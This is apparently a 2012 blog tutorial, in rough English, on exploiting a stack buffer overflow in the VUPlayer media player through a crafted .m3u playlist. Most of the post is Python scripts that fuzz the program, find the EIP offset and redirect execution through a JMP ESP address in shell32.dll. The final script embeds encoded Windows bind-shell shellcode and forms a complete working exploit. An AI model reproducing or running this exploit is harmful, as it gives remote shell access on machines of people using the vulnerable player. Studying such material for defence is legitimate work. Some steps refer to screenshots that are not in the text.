!!!

Tuesday, February 14, 2012

STACK OVERVLOW VUPlayer

First of all open applications VUPlayer, then open the application also Ollydbg for monitoring application that will diexploit
then go to backtrack, open the console and create a fuzzer that will be used to exploit the application VUPlayer, As for the script:





#!usr/bin/python
file="fuzz.m3u"
buffer="\x41" * 20000
f=open(file,'w')
f.write(buffer)
f.close()

After typing the above script, run fuzeer, note on your fuzzer direcktrori, copy the file. M3u created by the fuzzer was then run on the application fuzzer VUPlayer, then look in OllyDbg, we can see the character "A" pile






Once there is an error like the above, it is time to figure out how to register into the EIP register stack, having known the byte is loaded by 32 bit value, which contains an address which is stored inside the payload to be executed. There are several ways to find out, the byte register keberapa piled by the data transmitted by the fuzzer, among others, with the help exploit metasploit framwork.
As for how:





after the above step, the next stage is the result of pattern_create Copy the above into existing fuzzer created earlier, and the script as follows



#!usr/bin/python
file="fuzz.m3u"
buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0$
#buffer="\x41" * 20000
f=open(file,'w')
f.write(buffer)
f.close()

After adding data to the fuzzer patterb_create.rb you, run back to your fuzzer and copy back the file. M3u fuzzer that has been created and run the applications that will exploit.





 Different from the previous figure, the current value of the register in memory the application has been filled with a string VUPlayer pattern that had been incorporated into the application fuzzer.
Having managed to crash the application using the pattern of existing data, the next step is to find the byte string keberapa ada.Dalam overwrite registers are registers that alan Promised we pick out all the EIP and ESP
To do so, will use tools that both the pattern.offset.rb




customization to the next is a re-application fuzzer change the existing variable buffer
EIP and add variable values ​​therein. For more details see the following script.


#!usr/bin/python
file="fuzz.m3u"
buffer= "BASSMIDI"
buffer+= "\x90" * 1004
buffer+= "\xEF\xBE\xAD\xDE"
#buffer+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6A$
#buffer="\x41" * 20000
f=open(file,'w')
f.write(buffer)
f.close()

After writing the above script, execute again fuzz.m3u file that was created by the application fuzzer was MUPlayer





Apparent that there is value in the EIP register has been changed to DEADBEEF, next is to try to write ESP, where ESP is a temporary data storage area in memory. To test our script will do the customization in the existing application fuzzer, for more details see the script below:



#!usr/bin/python
file="fuzz.m3u"
buffer= "BASSMIDI"
buffer+= "\x90" * 1004
buffer+= "\xEF\xBE\xAD\xDE"
buffer+= "\x90" * (1008-len(buffer))
buffer+= "\xCC" * (20000-len(buffer))
#buffer+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6A$
#buffer="\x41" * 20000
f=open(file,'w')
f.write(buffer)
f.close()





Furthermore JMP ESP search in memory of existing applications, the following steps ikti
At Ollidbg application, choose the menu, view menu and then select Executable Modules
Log in Module Shell32.dll
The next search command JMP ESP, remedy do right click on the main window, search for, command a new window will appear and type the JMP ESP.





Before adding a JMP ESP address the fuzzer script, the first thing to do is change the offset into little endian format, from 7C9D30D7 be \ xD7 \ x30 \ x9D \ x7C



#!usr/bin/python
file="fuzz.m3u"
buffer= "BASSMIDI"
buffer+= "\x90" * 1004
buffer+= "\xD7\x30\x9D\x7C"
buffer+= "\x90" * (1008-len(buffer))
buffer+= "\xCC" * (20000-len(buffer))
#buffer+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6A$
#buffer="\x41" * 20000
f=open(file,'w')
f.write(buffer)
f.close()

Execute re-file fuzzer on VUPlayer





 The next step is to create a payload that will be incorporated into the buffer. Later, the buffer will be sent along with the JMP ESP address through the fuzzer.
The tool used is:


 


  Then open your web browser and enter the address 127.0.0.1:55555
Once open select the type of payload that will be used, in this case I am using Windows Bind Shell payload, after selecting the type of payload it will show the configuration of the payload that you use



After you configure the payload, click generate




  Copy the generated above into the fuzzer that you created earlier:



#!usr/bin/python
file="fuzz.m3u"
buffer="BASSMIDI"
buffer+="\x90" * 1004
buffer+="\xD7\x30\x9D\x7C"
buffer+="\x90" * 16
buffer+=("\x29\xc9\xb1\x51\xbb\x01\x24\x91\x2d\xdb\xd7\xd9\x74\x24\xf4\x58"
"\x31\x58\x0e\x03\x58\x0e\x83\xc1\x20\x73\xd8\x3d\x42\x98\x6e\x55"
"\x6a\xa1\x8e\x5a\xed\xd5\x1d\x80\xca\x62\x98\xf4\x99\x09\x26\x7c"
"\x9f\x1e\xa3\x33\x87\x6b\xeb\xeb\xb6\x80\x5d\x60\x8c\xdd\x5f\x98"
"\xdc\x21\xc6\xc8\x9b\x62\x8d\x17\x65\xa8\x63\x16\xa7\xc6\x88\x23"
"\x73\x3d\x59\x26\x9e\xb6\xc6\xec\x61\x22\x9e\x67\x6d\xff\xd4\x28"
"\x72\xfe\x01\xd5\xa6\x8b\x5f\xb5\x92\x97\x3e\x86\xea\x7c\xa4\x83"
"\x4e\xb3\xae\xd3\x5c\x38\xc0\xcf\xf1\xb5\x61\xe7\x57\xa2\xef\xb9"
"\x69\xde\xa0\xba\xa0\x78\x12\x22\x25\xb6\xa6\xc2\xc2\xcb\xf4\x4d"
"\x79\xd3\x29\x19\x4a\xc6\x36\xe2\x1c\xe6\x11\x4b\x14\xfd\xf8\xf2"
"\xcb\xf6\x06\xa1\x79\x05\xf8\x99\x16\xd0\x0f\xec\x4a\xb5\xf0\xd8"
"\xc6\x69\x5c\xb7\xbb\xce\x31\x74\x6f\x2e\x65\x1c\xe7\xc1\xda\x86"
"\xa4\x68\x03\xd3\x23\xcf\xde\xab\x74\x58\x20\x9d\x11\x77\x8f\x74"
"\x19\xa7\x47\xd2\x48\x66\x71\x4d\x6c\xa1\xd2\x24\x6d\x9e\xbd\x23"
"\xd8\x99\x77\xfc\x24\x73\xd7\x56\x8f\x29\x27\x86\xbc\xba\x30\x5f"
"\x05\x43\xe8\x60\x5f\xe1\xe9\x4e\x06\x60\x72\x08\xaf\x17\x17\x5d"
"\xca\xb2\xb7\x04\x3c\x8f\xb1\x51\x54\x4b\x4b\x7f\x98\x93\xb8\xd5"
"\x25\x51\x12\xd7\x98\x7a\xff\xaa\x67\xbb\x54\x1f\x3c\xd3\xd8\xa1"
"\xf0\x32\xe2\x28\xb3\xc5\xca\x89\x6c\x68\xa2\x7c\xc2\xe6\x45\x2f"
"\xb5\xa3\x14\x30\xe5\x24\x3a\x17\x03\x7b\x17\x58\xda\xe9\x67\x59"
"\xd4\x12\x47\x2e\x4c\x11\xeb\xf4\x17\x16\x3a\xa6\x28\x38\xab\x38"
"\x0f\x5b\x5f\x97\x50\x4a\x5f\xc7")
f=open(file,'w')
f.write(buffer)
f.close()

restart fuzzer that you created earlier





After fuzzer successfully executed the following command to do this:
  





Congratulations, you successfully exploitation VUPlayer ...


No comments:

Post a Comment